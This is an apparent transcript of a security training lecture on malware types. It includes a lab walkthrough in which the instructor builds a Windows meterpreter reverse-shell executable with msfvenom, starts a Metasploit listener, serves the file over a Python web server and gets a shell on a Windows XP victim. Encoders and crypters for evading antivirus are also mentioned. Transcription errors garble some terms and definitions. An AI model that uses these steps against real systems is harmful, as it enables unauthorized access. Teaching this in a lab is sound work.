Okay, yeah. So record has been started. The module that we're gonna start is today is malware and threats. So I guess we have know about some of the malware words, or we can say the word called virus. Hmm? So over here, first of all, for the demonstration, I'm gonna take my Kali Linux server, and I'm gonna take my a victim server that would be my Windows XP. This will be our victim. So we're going to talk about what exactly the malware and what are the functionality of malware and what could be the possibilities to gain unauthorized access with the help of malware. So let's try with it. So this is an old sound. We are very familiar with this one. Yes. Yeah, so we have an attacker and we have our victims. So over here, I think I have some malwares over here. That's this one, shells. So we're gonna create some malware over here. We're gonna use Metasploit, and we're gonna use one more thing, and that would be a tool of Metasploit that would be known as MSF Venom. MSF Venom is basically used to create some malwares or some binary codes on the server side. You can see MSF Venom is a combination of MSF payload. A payload, if I talk about the definition of payload, a payload is just a piece of code which is coded by the hacker to function malwares. Multitasking, you can see. Encoding is basically your encryption standard, how you can hide your malware with the encoding type. We're gonna discuss this one later part, but before that, let's talk about a basic terminologies. What are the purpose of malware? So if I talk about the word malware, malware is just a short form of your malicious software, or you can say your piece of code or a program that can be perform many multiple functions, and each and every malware has a different functionality. So if you see over here, computer program designed to infiltrate and damage computer without the user consent. Malware is a general term covering all the different types of threats to your computer safety, such as your viruses, spyware, worms, trojans, rootkit, and so on. So we can see viruses, spywares, worms, trojan, rootkits. These are the types of malwares. But each and every malware has a different functionality. See this one. If we talk about the malwares has different things, and some of the malwares which is given over here like your virus, worms, Trojan horse, and spyware. For example, if we talk about the word spyware applications are basically used to spy on a specific host and check all the activities which is performing over there. So if you talk about these, malicious programs can perform a variety of functions, including, now it's talking about the functionality of the malware. It's including stealing, encrypting, or deleting sensitive information, and altering and hijacking the core mechanism of the computer activity without the permissions. So these are the things which can be performed with the malware: stealing information, encrypting the data. If I talk about the encrypting the data or deleting the sensitive information, this information can be leaked in the ransomware attack. Encrypting the data, ransomware attack. So I guess recently one of the famous company in India has been attacked, which is your Haldiram. So let's move on to what are the types of malwares over there, what are the common types of malware, what could be the possibilities. And remember one thing, there is a word over here, some words like your what is called threats, what is called payload, and what is called your shell code. These are part of your malware. Threats, payloads, shell codes are just same words. Threats are basically your weakness. Payloads are your malicious code. Shell codes are your binary code of payload design, which is written in assembly language. Most of these three things are the same thing, but they are totally different. If you look to any of the books over here on the Metasploit, you will see the three different definitions of this. For example, see this one, the book I was talking about. I guess we are talking about the Metasploit. See, compare this one. You'll see exploit. Exploit is just which an attacker or pen tester or a meta takes advantage of the flow within the system, which is known as threats. Payload, a payload code that can be wants to system to execute and can be selected and delivered by the frameworks. If you talk about the word shellcode, shellcodes are basically your instruction used by the payload when exploiting occurs. See, exploit, payload, shellcodes, these are totally three things which are the same. There is nothing difference between them, those things. Same, just like here over here, the viruses are the combinations of your threats, exploit, payloads, or shellcodes. If you are a good programmer, you can create your own shellcodes. Basically, the word malwares are just a bad programming or bad algorithm set. For example, each and every malware has a different functionality. If I talk about the virus, what is the major cause of virus? If a system is infected with a virus, it will infect the core mechanism, or you can say the applications. And viruses can slow down your servers, or it can consume the CPU memories, or it can pop up unwanted websites, or anything could be on the web browser. For example, you can see it's most common types of malware which can be executed itself by spread by infecting the other programs and files over there. See. So if you talk about the worm can self-replicate. A worm can self-replicate without a host program and typically spread without any human interaction or directives from the malware authors. It can be self-replicate without a host program and typically spread without any human interaction or directives from the malware authors. A Trojan horse. Trojan horse is designed to create a legitimate program in the order to gain access to the system. I will say this Trojan horse belongs to a movie called Troy, where two states were fighting between them, and the second one gives a simple horse with an army inside. A Trojan horse, which looks like a genuine legitimate application, but this is the most dangerous thing. And it can be infected the core mechanism, or it can be function malware things on the server side. Once activated the following installation, Trojan can execute their malicious function. Each and every Trojan has their different functionality. For example, as per given over here, including stealing, encrypting, deleting sensitive data, altering or hijacking the computer core applications. Same just like your spywares. Most of the company use spywares to uh, have an eye on their employees and their activities, what are they doing over there. So I will not say spyware, there will be DLPs, data loss preventions. Most of the company use DLP for having an eye on each and every servers on their net infra. But spyware is totally different. It's the same thing, but the major part when you're installing a spyware, whenever the user activity is performing over there in a specific application, it can be performed easily. It made all the connected information and data device user and observe their activity without their knowledge. You can see ransomware attack. Ransomware is designed to infect a user system and encrypt the data. See, and cyber criminals then demand a ransom payment for the victim in exchange of the decrypting the system file. there would be some possibilities that can be help us for information gathering part. There are many further things can happen, but the major perspective is to simply get what exactly the ransomware attack is. Same as your other ransomware attacks, just like your ransomware saying normal rootkit. A rootkit also is also malware, and rootkits are basically used to gain administrator access on the server. It is created to obtain administrator level access to the victim machine, full authority on the server. You can see once it's installed, the program can give threat actor to root privilege access to the system. Same just like your backdoors. Backdoors are just like your malwares, but it's a rat, remote access to you. And what is the major objective of the backdoor over here? A backdoor can simply used when the attacker has completed his task on the specific server, and he thinks that I have to come later on also. So he put a malware behind that. So through that malware, through the backdoor, he can connect with that server again whenever he needs that. If you see over here, secretly creates a backdoor into the infected system that allows the threat actor to remotely access without altering the user and system security program. For example, we're going to create a normal malware over here. And have you ever seen adwares, the major objective of adwares? Through the adwares, attacker may try to simply pop up any of the unwanted banners on your website, or through the browser, through the adwares, they can simply track your browser history. For example, if I'm using a website over here, let's use a website called Tempmail. So I was talking about these adwares. Whenever we are visiting a website, we can see these adwares, but sometimes attacker use these adwares to simply track the victim's browser history. So that's why most of the time we use ad blockers to block all the ads over here, which we can see over this one. And the most common thing, through the adwares, it is used to track user browser and download history with intent to pop up advertisement that alert the user to making a purchase. See, for example, an advertiser might use cookies to track web pages and visit to better target advertisement. See this one. Same as your keyloggers. Keyloggers are also your applications, but keyloggers are basically used to simply uh, have a monitoring of all the keystroke that a victim is typing over there. Keystrokes, whatever the key he's typing, also known as system monitor, are used to see everything a user does on their computer. Yeah, so now if we know about the basic what are the virus worms and trojans and ransomware, now if we talk about the major components, how the shell works, how the malware works. See over here, whenever you are visiting an exploit.db website, most of the malwares are created with MSF venom. Let's talk about SLMail. This is SLMail is an application, and over here, if you click this one, pop, most of the malwares are can be. This is a connectivity. This is a buffer overflow attack, and okay, not this one. This is denial of service attack. Yeah, this is buffer overflow attack, and most of the you can say the memory corruptions are based on buffer overflow. And these are some offset values. This is the major vulnerability. These are the major binary codes that can be read, and this is based on Python part. I was talking about free float. This is also a vulnerability. This is also a buffer overflow. Free float BOF buffer overflow. Ah, there's no over there. But we're gonna look at this one. Let's have a look in the real life scenarios how a victim can be compromised. So if we talk about the word shell, which is given over here, a shell is just a piece of code coded by the hacker to gain unauthorized access or perform unmalicious things over there on the server side. So the shells could be execution in your servers, mobile phones, etc. But have you ever wondered how a shell can work? Simple. Yes. Hello. Okay. Yes. Hi, Jaydeep sir. Yes.
Hello, just join.
Yeah, no issue, no issue. So just let's have carry on. Hmm. Okay, so we were talking about the shell. So if how the shell command works. So whenever an attacker want to compromise any of the servers, think about it. A malware can be connected with the internet. So it could be on the LAN network, but we have the WAN, which is wide area network. So what could be the possibilities? There are two types of shells. One is called reverse shell and one is called bind shell. These two methodologies are used in the real life scenarios. And how it possible? See this one. A reverse shell is a shell where an attacker will send a piece of code to the victim through a mail or through a message or through anything. And in that specific shell, which is called a reverse shell, which has a return address, which will communicate back to the attacker. Why? Because when we have this, I'm in my local network and this victim is also in his local network. So what could be the possibilities? So if you want to compromise that server, which is on the WAN network, you have to send a piece of code. The attacker will have to send a piece of code on the victim machine. So through that victim machine, if the victim execute that payload on his system, so it will communicate back to the attacker machine. Why? Because on that specific malware, there's a return address which will call back, return back. You can see a reverse shell is a type of shell in which the target machine communicates back to the attacking machine, and the attacking machine has a listener port on which it receives the connection by using code or command execution and achieved. So there are some possibilities one by one that can be used for the further stages. Same just like your bind shell. A bind shell is a different thing. A bind shell is an attack where an attacker will communicate or make a direct connection with the victim machine. Why? Because the victim machine has a listener port is open. A bind shell is a type of shell in which the target machine opens a communication port to the listener. The target machine opens a communication port on the listener on the victim machine and waits for the incoming connection. And the attacker then connect to the victim machine's listener that leads to a code or command execution on the server side. Command execution means we can simply execute any command on the server side. For example, you can see they have given lots of other shells also. For example, when you go further for the experimentation part, you will see there's a website like Pentest Monkey. Yeah, JTrackers note. Pentest Monkey is also one of the website which is used for reverse shell cheat sheet. So it means a reverse shell that we have to execute on the victim side. Then we can communicate or it will execute on the listen part. So what we're gonna do over here, we're gonna try to create a bind reverse shell and a bind shell with the help of Metasploit today. Creating Metasploit over here. So we're gonna try this one. So over here, often most of the useful and beginner understand. And over here you can see I have given some binaries in Metasploit for Linux, for Windows, for Mac, for PHP, ASP, lots of things. But in the last and the least, you can see Metasploit handler can be great quickly setting up Metasploit to be positioned to receive your incoming shells. So Metasploit can also work as a listener. We can use Metasploit as a listener also. So what I'm gonna do over here, we're gonna try to make our own shellcode with the help of our MSF Venom, as I mentioned you. So over here for the today's task, I'm gonna need MSF Venom. Through that we're gonna create some shells over here, and we're gonna use Metasploit for listener for receiving, you can say, over here. So we're gonna do one thing over here. We're gonna create our own Metasploit. So first of all, MSF Venom. So MSF Venom is one of the tool of your Metasploit framework. You can see over here. They have given example how to use. You will see like user bin MSF Venom -p payload type, the payload that you're gonna use over here. As I mentioned, you lhost. Lhost is your localhost IP address. -f format. exe, as we know, Windows machine runs exe files. -o for the output and the name of the payload. But before that, let's have a look over here. -fn payloads. -fn list. This is gonna show you the modules over here. So the payloads will be our piece of code. So let's do -fn payloads. So the payloads on your local servers are around 556 payloads. It's gonna take all the payloads from Metasploit, and you will see the payloads like here. These are the payloads, and you will see some payloads like your AEX, Android, Apple, BSD. BSD is also your Linux architecture, your CMD. But the major important thing is to listen in the check the descriptions. So over here, for example, these are the payload that we're gonna select, but you have to think which server is the victim machine is using. So over here, if I'm using a Windows machine, so it would so the only application can be run over here is the exe file. So -fn format is also important. -fn list format. Let me show you why. MSF Venom -list format. So through the list format, you have to examine which form you have to use. Is it ASP, ASPX, ASPC, DLL file, L file, which is used in Linux machines, exe file, which is used in Windows machines. So you have to specify which format you want to make your payload. -e is for encoder. As I mentioned, you encryption. There was a time when there was a, you can say, cryptors. Cryptors are basically used to hide your malware signatures. Let me show you the cryptor word. What is the use of cryptor? Cryptor. So you can see we have cryptor is a software tool that can be encrypt, obfuscate, and manipulate malwares. making it undetectable to the security program. This used by cybercriminals to create a malware that can bypass security program by presenting itself as a harmless program until it gets installed. So it depends on the server. So it depends on the server that which kind of malware it's going to show you and what could be the possibilities over there. So -e encoders, so these are encoders that are used for bypassing the firewall, but there was a time that we used this one excellent one, which is Shikata Genai X3286 is which is a 32 bytes of architecture. You see over here, and this was excellent because this application was polymorphic. Polymorphic malwares are basically to use for undetectable. -A architecture, -O architecture means 32 or 64 bytes. But the major important thing is there are around 500 payloads. We have to specify the specific one. So I'm going to use a pipe command, and I'm going to use a pipe function to merge a command, and I'm going to use grep command. Grep only for Windows. But still there are lots of Windows part. So again, let's use, I'm going to use grep. We're going to use reverse TCP, or we're going to use grep metapreter. As I mentioned you last time in the metapreter session, metapreter is the master controller of your Metasploit. It has multiple applications. See, from the 500, now we can see where we have created the Windows only with the reverse TCP and the metapreter. Otherwise, you can do one thing. You can simply search in the Google MSF Venom cheat sheet. There are lots of websites that you can use it over here. We don't have that much of time to remember all the things. See, so we're gonna use the MSF Venom cheat sheet just over here. So you will see metapreter reverse TCP for this is for 32-bit of architecture. Metapreter bind TCP. It means we're gonna make a proper connection with the target. So let's do one thing. Let's create our own payload. So I'm gonna use. First of all, we don't know is it a 32-bit or a 64-bit of architecture. So I'm gonna use this one. Okay, first of all, this is this one. This is a simple one. Windows metapreter reverse TCP. There is no is it 32 or 64 bits. This is, they don't have DNS, RC4 DNS, UID, and support all the things one by one. So let's try the first one over here. So we're gonna use this format. We're gonna use MSF Venom -p represent the payload which you are going to use. So let's try to use this one. So the command would be MSF Venom -p, the payload, and the payload we are using, Windows metapreter reverse TCP. And then now comes the lhost. Lhost means the return address. So we're gonna use our own return address, because when this application will call, it will give us a proper reverse shell. So my IP address is 110. So let's use this one. And the port number also, we need to communicate with our port on the server. So this is a normal LAN malware, so we're gonna use port, any of the random port. That would be my 4448. And we're gonna use -f also. -f, why are we gonna use -f? Because through the exe file, we're gonna create a file on format exe -o for the output to save, which will be on the root desktop, and I'm gonna name this one shell.exe. See, so you can see the payload has been created. You can see no platform has been selected. This platform just like is it Windows. So you can write -f platform Windows over there. No architecture was selected. Is it a 32-bit or 64 bits? And no encoder or bad character specified. I didn't use any encryption standard over here. Or you can see the payload size of the bytes. And after the final size, you can see a proper bytes are generated. So the file name is shell.exe. If you see over here, this is on the Windows server. Let me move to this one, to the desktop. Shell. See, this is a normal exe file. So let me show you over here. Let's use file utility to examine the file type. So this is normal p executable file, so for Windows. Now the major part comes. We have to send this malware that we have created to the victim machine. So for the demonstration, we can think like a hacker, that I can simply bind this malware with any of the applications, or we can send this malware in the social media also. But over here, I'm gonna activate my listener first of all, because when this payload will execute, it will return back to the listener. So activating the listener, you can see over here. For activating the listener, we're gonna use exploit multi-handler. Multi-handler is for multiple connection, when multiple listener activate. Set payload, the payload that you have used over here on your payload part. You have to specify the L host that you used, L port also, and the exploit. So let's do over here. So I'm going to use exploit multi/handler. So the multi-handler has been set, the multiple connectivity. So set payload that would be on my Windows meta Twitter reverse underscore TCP. So remember one thing, when you are setting a payload, the payload should be the same that you have used on the malware. It should be the same, because this is a part of your Metasploit. MSFN is a part of your file. So options, in options you have to set the L host and the L port that you have mentioned in your payload also. So set L host, we're gonna use our attacker IP address. Set L port 4448 as we have mentioned. Let's do clear. Let's do options. And over here we can see that the username has been set and the code has been set. So the last in the list, what are we gonna do? We're gonna do exploit. It means activate the listener mode. So over here on the screen, you can see the listener has been activated. Let's do one thing. Let's check netstat ANTUP. We have a listener activated in our local server, see, which is Ruby. And now the main part comes. Now we have to share the payload over here. So for the demonstration, what I'm going to do over here, I'm going to use some FTP server commands. So I'm going to use rope close. Rope file transfer. Yes. So we have one thing in our Kali Linux that Kali Linux can be used to share files on the local network. We can see I'm using a blog named Rope transfer files from Linux to Windows. So think about it. Most of the websites are based in Linux. So whatever the things we are grabbing for, like resources, any of the websites, they have a one specific directory, which is your Apache directory. In Apache directory, all the files has been broadcast to the WAN network. You can see over here the Apache directory, which is on your WAR www HTML. And over here we can see there are two files over there. WAR www HTML is a part of your Apache server, which is basically used to host your web application resources to the WAN network that can be used for the large varieties. But over here we're going to try to manipulate, or we're going to check one by one. So over here, for the file transfer protocol, if you see the blog which I has opened, try this one. You can try the HTTP server, you can try the FTP server, TFTP, or you can share the data from SME also. So if you try the HTTP server, you will see you can try to call, you can serve a file by Apache by just copy to the WAR HTML part, or you can simply share the files on the local area network. Or the other option is just start a Python web server directly inside the shell directory. Inside the shell directory means where the payload has been set, like this one. This only requires a single line of Python, that thanks to Python simple HTTP module. This command will make a specific folder, a normal FTP server on your local network. See this one, how it gonna work. This is the file which is contained in the shell code. This is the directory, home exploit folder. So I'm gonna open a directory over here. So my file shell.exe is over there. So what are we gonna do? We're gonna create our own FTP server. So Python -m, which is your module, simple HTTP server, the port 80. So if you are using port 80 on your local servers, and then the port 80 will be busy because it's running on an FTP server. So see this one. Let's try netstat. Cross verify. Here I can see the port 80 is running. That's the port 80 over here. And see one thing, how it gonna work. So this 110, which is my IP address, see this one. If anyone in the local network knows my IP address, which is hosting on the network part, he can do one thing. He can just put my IP address on the browser, and he can grab access to my files, any of the files over here. See, which is 39772.zip, burp, dictionary, and shell.exe. Right now, this one is working less like my FTP server for sharing files. Let's try to download this file. So let's see, this file has been downloaded, but we didn't receive any. And in the FTP server, you can see the data has been received. Let's try this one. The shell didn't execute it till now. Still, it's on the receiving mode. But what will happen if a victim will execute this payload? The publisher could not verify it. Are you want to sure to use this application? Yes. So when the victim will execute that payload, it will communicate back to the attacker machine on the specific port they were using. And see, we have a metadata shell which can be used for multiple applications. See this one. Now you will see between the 110 and 112 a connection has been established with the Ruby. A Ruby application has been executed. So a malware has a different functionality as I described you, and there are many further things can be happened one by one. So remember, each and every malware has many things. 4448, which is connected in the server 192.112, and 112 is the IP address of the Windows machine. See this one. IP config 112 IP address. And if we have a metadata shell, as we have done the last system hacking, with the metadata shell we can perform many other things. So the most important thing is to understand how the malware application works. If you search for the software's predefined application that can be used for performing Trojan Horse, you can use there's an application called Dark Comet. Dark Comet is also one of the remote administrator tool. Dark Comet is a remote access Trojan developed by the Jane Press, independent. It was, you can see this is a rat machine which will give you a administrator access. You can use Dark Comet, and most of the malware. See, if you, I'm gonna use this function again, but right now I'm gonna show you how the exact application looks like. When you are simply writing a program or a malware, the actual format of the program, which you have done in the form of exe, it will be a buffer memory like this. This is the actual code of your buffer when the payload will execute. These are the offset values. Each and every binary is offset values over there. So if I talk about the offset memory, which is your 0 to 9 A2F, and you will see C8 to HF, you will not see M and A2F. After F you will see nothing, and 0 to 9. The binary codes 0 to 9 A2F, which can be your offset memory. Offset. Many other possibilities over there, one by one. So the major class over here is to simply check all the things over here.
So, the payload is exactly a piece of code. So